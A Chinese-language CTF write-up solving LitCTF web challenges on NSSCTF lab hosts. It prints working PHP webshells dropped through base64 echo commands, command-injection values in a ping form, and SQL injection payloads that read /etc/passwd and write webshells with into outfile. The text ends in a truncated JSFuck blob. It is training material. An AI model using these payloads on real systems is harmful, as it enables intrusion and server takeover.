您现在的位置是:首页 >技术杂谈 >4.LiCTF NSSCTF WEB方向部分 WriteUp网站首页技术杂谈

4.LiCTF NSSCTF WEB方向部分 WriteUp

qwsn 2024-06-17 10:19:33
简介4.LiCTF NSSCTF WEB方向部分 WriteUp

在这里插入图片描述

文章目录

0x01、我FLAG呢?【源码信息泄露+js信息泄露】

源码有flag:<!--flag is here flag=NSSCTF{8f83d19f-09d7-43da-8ff7-9fdde5dbcac1} -->

彩蛋寻找:找到了一个空格flag.php文件

┌──(root㉿kali)-[~/dirsearch]
└─# python dirsearch.py -u http://node5.anna.nssctf.cn:28919/

|. _ _ _ _ _ | v0.4.3
(||| ) (/(|| (| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11710

Output: /root/dirsearch/reports/http_node5.anna.nssctf.cn_28919/__23-05-13_23-38-17.txt

Target: http://node5.anna.nssctf.cn:28919/

[23:38:17] Starting:
[23:38:55] 301 - 169B - /assets -> http://node5.anna.nssctf.cn/assets/
[23:38:55] 403 - 555B - /assets/
[23:39:16] 200 - 0B - /flag.php

Task Completed

页面源码,通过http://node6.anna.nssctf.cn:28980/assets/js/script.min.js,发现其内有:

Function.prototype.getMultiLine = function () {
    var lines = new String(this);
    lines = lines.substring(lines.indexOf("/*") + 3, lines.lastIndexOf("*/"));
    return lines;
  }
  var string = function () {
  
    /* 娆竳浠€涔堬紒浣犵湅鍒版垜浜嗕箞锛�
    
    鎭枩浣犲彂鐜颁簡褰╄泲鍝
    ______  __             _  _______   _______  _            _  __ ____          _ 
   |  ____|/_ |           | ||__   __| |__   __|| |          | |/ /|___         | |
   | |__    | | _ __  ___ | |_  | |  ___  | |   | |__    ___ | ' /   __) | _   _ | |
   |  __|   | || '__|/ __|| __| | | / _  | |   | '_   / _ |  <   |__ < | | | || |
   | |      | || |   \__ | |_  | || (_) || |   | | | ||  __/| .   ___) || |_| ||_|
   |_|      |_||_|   |___/ \__| |_| \___/ |_|   |_| |_| \___||_|\_|____/  \__, |(_)
                                                                            __/ |   
                                                                           |___/    
    try to run giveMeEgg() to get the egg!good luck~ 
    wink wink~
    */
  }

点击控制台,也显示了:

欸~什么!你看到我了么!
    
    恭喜你发现了彩蛋哦~
    ______  __             _  _______   _______  _            _  __ ____          _ 
   |  ____|/_ |           | ||__   __| |__   __|| |          | |/ /|___         | |
   | |__    | | _ __  ___ | |_  | |  ___  | |   | |__    ___ | ' /   __) | _   _ | |
   |  __|   | || '__|/ __|| __| | | / _  | |   | '_   / _ |  <   |__ < | | | || |
   | |      | || |   \__ | |_  | || (_) || |   | | | ||  __/| .   ___) || |_| ||_|
   |_|      |_||_|   |___/ \__| |_| \___/ |_|   |_| |_| \___||_|\_|____/  \__, |(_)
                                                                            __/ |   
                                                                           |___/    
    try to run giveMeEgg() to get the egg!good luck~ 
    wink wink~

控制台下运行:giveMeEgg()
giveMeEgg()
script.min.js:49 LitCTF{First_t0_The_k3y! (1/?)
script.min.js:50 多留意一下哦~ 说不定就找到下一个了呢~

得到第一个彩蛋:
LitCTF{First_t0_The_k3y! (1/?)

0x02、导弹迷踪【js信息泄露】

查看源码,找到一个js文件夹,http://node5.anna.nssctf.cn:28482/src/game.js

其内发现了:F|L|A|G {y0u_w1n_th1s_!!!}
text: function () {if (mLevel === 6) {return ‘GOT F|L|A|G {y0u_w1n_th1s_!!!}’;} else {return ‘CLICK TO CONTINUE’;}},

因此flag:F|L|A|G {y0u_w1n_th1s_!!!}
注意:提交的格式为NSSCTF{y0u_w1n_th1s_!!!}

0x03、Follow me and hack me【hackbar+burp+备份文件】

使用HackBar传入GET和POST数据,点击execute执行,同时Burp抓包,再发送获得flag:
NSSCTF{6ebfbb4f-856b-4941-adac-a20c85ce1d99}
POC:
POST /?CTF=Lit2023 HTTP/1.1
Host: node6.anna.nssctf.cn:28285
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://node6.anna.nssctf.cn:28285
Connection: close
Referer: http://node6.anna.nssctf.cn:28285/?CTF=Lit2023
Upgrade-Insecure-Requests: 1

Challenge=i%27m_c0m1ng

寻找彩蛋:0B的flag.php、还有一个www.zip
┌──(root㉿kali)-[~/dirsearch]
└─# python dirsearch.py -u node6.anna.nssctf.cn:28465

|. _ _ _ _ _ | v0.4.3
(||| ) (/(|| (| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11710

Output: /root/dirsearch/reports/_node6.anna.nssctf.cn_28465/_23-05-13_23-44-10.txt

Target: http://node6.anna.nssctf.cn:28465/

[23:44:10] Starting:
[23:45:11] 200 - 0B - /flag.php
[23:46:05] 200 - 881B - /www.zip

Task Completed

从www.zip中获取:
<?php // 第三个彩蛋!(看过头号玩家么?) // _R3ady_Pl4yer_000ne_ (3/?) ?>

0x04、PHP是世界上最好的语言!!【代码执行 getshell】

system(‘ls’);
system(‘pwd’);
system(‘find / -name flag*’);
system(‘cat /flag’);
//POWERFUL PHP TOOL
flag=NSSCTF{43fc5c29-e6b5-44f7-92d6-b2bef957a27c}

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==

echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

system(‘echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php’);

蚁剑连接:http://node5.anna.nssctf.cn:28517/cc.php

system(‘find / -name flag*’);的结果:
/sys/devices/pnp0/00:04/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS15/flags /sys/devices/platform/serial8250/tty/ttyS6/flags /sys/devices/platform/serial8250/tty/ttyS23/flags /sys/devices/platform/serial8250/tty/ttyS13/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /sys/devices/platform/serial8250/tty/ttyS4/flags /sys/devices/platform/serial8250/tty/ttyS21/flags /sys/devices/platform/serial8250/tty/ttyS11/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS28/flags /sys/devices/platform/serial8250/tty/ttyS18/flags /sys/devices/platform/serial8250/tty/ttyS9/flags /sys/devices/platform/serial8250/tty/ttyS26/flags /sys/devices/platform/serial8250/tty/ttyS16/flags /sys/devices/platform/serial8250/tty/ttyS7/flags /sys/devices/platform/serial8250/tty/ttyS24/flags /sys/devices/platform/serial8250/tty/ttyS14/flags /sys/devices/platform/serial8250/tty/ttyS5/flags /sys/devices/platform/serial8250/tty/ttyS22/flags /sys/devices/platform/serial8250/tty/ttyS12/flags /sys/devices/platform/serial8250/tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS20/flags /sys/devices/platform/serial8250/tty/ttyS10/flags /sys/devices/platform/serial8250/tty/ttyS29/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS19/flags /sys/devices/platform/serial8250/tty/ttyS27/flags /sys/devices/platform/serial8250/tty/ttyS17/flags /sys/devices/platform/serial8250/tty/ttyS8/flags /sys/devices/platform/serial8250/tty/ttyS25/flags /sys/devices/virtual/net/eth0/flags /sys/devices/virtual/net/eth1/flags /sys/devices/virtual/net/lo/flags /proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu0/domain1/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain1/flags /proc/sys/kernel/sched_domain/cpu2/domain0/flags /proc/sys/kernel/sched_domain/cpu2/domain1/flags /proc/sys/kernel/sched_domain/cpu3/domain0/flags /proc/sys/kernel/sched_domain/cpu3/domain1/flags /proc/sys/kernel/sched_domain/cpu4/domain0/flags /proc/sys/kernel/sched_domain/cpu4/domain1/flags /proc/sys/kernel/sched_domain/cpu5/domain0/flags /proc/sys/kernel/sched_domain/cpu5/domain1/flags /proc/sys/kernel/sched_domain/cpu6/domain0/flags /proc/sys/kernel/sched_domain/cpu6/domain1/flags /proc/sys/kernel/sched_domain/cpu7/domain0/flags /proc/sys/kernel/sched_domain/cpu7/domain1/flags /flag

0x05、Vim yyds【命令执行 getshell】

访问:.index.php.swp
下载下来

恢复文件:
vim -r .index.php.swp
或者vi -r .index.php.swp

我们可以发现恢复的内容为:

<html>
<head>
    <meta charset="UTF-8">
    <style type="text/css">
        body,
        html {
            display: flex;
            align-items: center;
            justify-content: center;
        }

        div.vim {
            display: flex;
            align-content: center;
            vertical-align: middle;
            justify-content: center;
        }

        img {
            border: none;
            width: 8rem;
            height: auto;
        }

        h1.vim_yyds {
            color: #50f728;
            display: flex;
            align-items: flex-start;
            justify-content: center;
            margin-top: 50;
            margin-left: 5px;
        }

        h3.vim_said {
            color: #39c2ff;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        br,
        p {
            font-size: 20;
        }
    </style>
</head>

<body>
    <main>
        <div class="vim">
            <img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img>
            <h1 class="vim_yyds">
                Vim yyds
            </h1>
        </div>
        <h3 class="vim_said">
            队里师傅说Vim是世界上最好的编辑器,不接受反驳
        </h3>
        <div class="can_can_vim">
            <?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>
        </div>
    </main>
</body>

关键点:

<?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>

Give_Me_Your_Flag
base64编码:R2l2ZV9NZV9Zb3VyX0ZsYWc=
POST传入:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
NSSCTF{1c21591c-7690-47ee-8426-54f79824f06d}

写入webshell:

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==

echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

蚁剑连接:http://node6.anna.nssctf.cn:28554/cc.php 密码为cc

0x06、作业管理系统【创建文件 getshell】

admin/admin登录
创建文件:cc.php

<?php eval($_POST['cc']);?>

蚁剑连接即可找到根目录的flag
flag=NSSCTF{959f0158-c22a-471b-8926-879171fae14c}

寻找彩蛋:
远程下载有个默认链接https://github.com/ProbiusOfficial/My_pic/blob/main/demo.jpg,访问发现第二个彩蛋
wow 你找到了第二个彩蛋哦~
_S0_ne3t? (2/?)

0x07、狠狠的注入【SQL注入 getshell】

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23
Array ( [0] => Array ( [username] => information_schema [password] => 2 )
[1] => Array ( [username] => mysql [password] => 2 )
[2] => Array ( [username] => ctftraining [password] => 2 )
[3] => Array ( [username] => performance_schema [password] => 2 )
[4] => Array ( [username] => test [password] => 2 )
[5] => Array ( [username] => ctf [password] => 2 ) )

?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema=‘ctf’%23
//users

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘users’ and table_schema=‘ctf’%23
// id,username,password

?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1tanjiOHHHHHHH,2fake_flagF1rst_to_Th3_eggggggggg!}
//假的flag

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema=‘ctftraining’%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘flag’ and =‘ctftraining’%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘news’ and table_schema=‘ctftraining’%23
//id,title,content,time

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘users’ and table_schema=‘ctftraining’%23
//id,username,password,ip,time

?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema=‘ctftraining’%23
//0 results

?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema=‘ctftraining’%23
//0 results

?id=-1)))))) union select flag,2 from flag where table_schema=‘ctftraining’%23
//0 results

怎么会是空的呢????
可能是语句的问题,我们使用Sqlmap直接跑:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D “ctftraining” -T flag -C flag --dump
//NSSCTF{b029dc6f-0160-4b1e-b2c1-4aeb301dc3e2}

经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{d999de63-d796-4151-b10e-c77cbc87ab64}

寻找彩蛋:
之前查到的假的flag,好像是最后一个彩蛋:
F1rst_to_Th3_eggggggggg!}

?id=-1)))))) union select load_file(‘/etc/passwd’),2%23
root❌0:0:root:/root:/bin/ash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/mail:/sbin/nologin
news❌9:13:news:/usr/lib/news:/sbin/nologin
uucp❌10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator❌11:0:operator:/root:/sbin/nologin
man❌13:15?/usr/man:/sbin/nologin
postmaster❌14:12:postmaster:/var/mail:/sbin/nologin
cron❌16:16:cron:/var/spool/cron:/sbin/nologin
ftp❌21:21::/var/lib/ftp:/sbin/nologin
sshd❌22:22:sshd:/dev/null:/sbin/nologin
at❌25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid❌31:31:Squid:/var/cache/squid:/sbin/nologin
xfs❌33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games❌35:35:games:/usr/games:/sbin/nologin
cyrus❌85:12::/usr/cyrus:/sbin/nologin
vpopmail❌89:89::/var/vpopmail:/sbin/nologin
ntp❌123:123:NTP:/var/empty:/sbin/nologin
smmsp❌209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest❌405?guest:/dev/null:/sbin/nologin
nobody❌65534:65534:nobody:/:/sbin/nologin
www-data❌82:82:Linux User,:/home/www-data:/sbin/nologin
mysql❌100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx❌101:102:nginx:/var/lib/nginx:/sbin/nologin

?id=-1)))))) union select load_file(‘/etc/nginx/nginx.conf’),2%23
Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri u r i / / i n d e x . p h p ? uri/ /index.php? uri//index.php?args; } location ~ .php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME d o c u m e n t r o o t document_root documentrootfastcgi_script_name; } } } [password] => 2 ) )

?id=-1)))))) union select load_file(‘/var/www/html/index.php’),2%23

Array
(
    [0] => Array
        (
            [username] => <?php
    error_reporting(0);
  include "connect.php";
?>
<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>狠狠的注入涅~</title>
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic&amp;display=swap">
</head>

<body>
    <header class="text-center text-white masthead"
        style="background:url('https://www.dmoe.cc/random.php')no-repeat center center;background-size:cover;">
        <div class="overlay"></div>
        <div class="container">
            <div class="row">
                <div class="col-xl-9 mx-auto position-relative">
                    <h1 class="mb-5">Search what you want to search</h1>
                </div>
                <div class="col-md-10 col-lg-8 col-xl-7 mx-auto position-relative">
                    <form method="get" action="">
                        <div class="row">
                            <div class="col-12 col-md-9 mb-2 mb-md-0">
                                <input class="form-control form-control-lg" type="text" name="id"
                                    placeholder="Enter your id to start">
                            </div>
                            <div class="col-12 col-md-3">
                                <button class="btn btn-primary btn-lg" type="submit">姨妈大!</button>
                            </div>
                        </div>
                    </form>

                </div>
            </div>
        </div>
    </header>
    


<section class="text-center bg-light features-icons">
    <div class="container">
        <div class="row">
            <div class="col-md-6"> 
                <h5>Key Source</h5>
                <pre><?php highlight_file(source) ?></pre>
            </div>
            <div class="col-md-6"> 
                <?php
                
                $sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
                echo "<h5>Executed Operations:</h5>"
                    .$sql
                    ."<br><br>";
                $result = $conn->query($sql);
                if ($result->num_rows > 0) {
                        print_r(mysqli_fetch_all($result, MYSQLI_ASSOC));
                } else {
                    echo "0 results";
                }
                ?>
            </div>
        </div>
    </div>
</section>



    <section class="showcase">
        <div class="container-fluid p-0">
            <div class="row g-0"></div>
        </div>
    </section>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>

</html>



            [password] => 2
        )

)

?id=-1)))))) union select ‘<?php phpinfo();?>’,2 into outfile ‘/var/www/html/info.php’%23
http://node6.anna.nssctf.cn:28413/info.php

?id=-1)))))) union select ‘<?php eval($_POST["cc"]);?>’,2 into outfile ‘/var/www/html/cc.php’%23
http://node6.anna.nssctf.cn:28413/cc.php

0x08、Http pro max plus【HTTP请求头】

1、Burp抓包:添加和修改http请求头
User-Agent: Chrome
Client-IP: 127.0.0.1
Referer: pornhub.com
Via: Clash.win

返回的内容:借一步说话—>> /wtfwtfwtfwtf.php

2、POC如下所示:
GET / HTTP/1.1
Host: node5.anna.nssctf.cn:28402
User-Agent: Chrome
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Client-IP: 127.0.0.1
Referer: pornhub.com
Via: Clash.win

3、访问/wtfwtfwtfwtf.php页面
发现返回了如何让我们连外网,其实当前页面源码有东西

<!--你就冲吧,什么都冲只会害了你自己 bdy好康的在 /sejishikong.php-->

4、访问/sejishikong.php页面,得到flag
冲完啦?拿上你的flag赶紧走NSSCTF{78272e23-99df-46ec-9949-74abf0a971dd}

0x09、Ping【命令执行 getshell】

前端有限制,众所周知前端的限制只是为了前端用户可以输入有效的数据,让后端减小开销,更好的处理数据
因此,前端的限制是不安全的,这里BurpSuite抓包,发到重放模块:

command=127.0.0.1|whoami&ping=Ping
//返回www-data

command=127.0.0.x||find / -name flag*&ping=Ping
//返回:/flag

command=127.0.0.x||cat /flag&ping=Ping
//返回:flag=NSSCTF{e3c1168b-4204-4875-a84b-bacdca94b744}

写入webshell:

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==
echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

command=127.0.0.x||echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php&ping=Ping

蚁剑连接:http://node6.anna.nssctf.cn:28236/cc.php 密码cc

0x0a、1zjs【js信息泄露】

源码后,查看用到了js文件http://node6.anna.nssctf.cn:28119/dist/index.umd.js

发现了注释:/f@k3f1ag.php
PERFORMANCE OF THIS SOFTWARE.Your gift just take it : /f@k3f1ag.php

访问:/f@k3f1ag.php

(+[![]]+[])[+[]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]())[!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[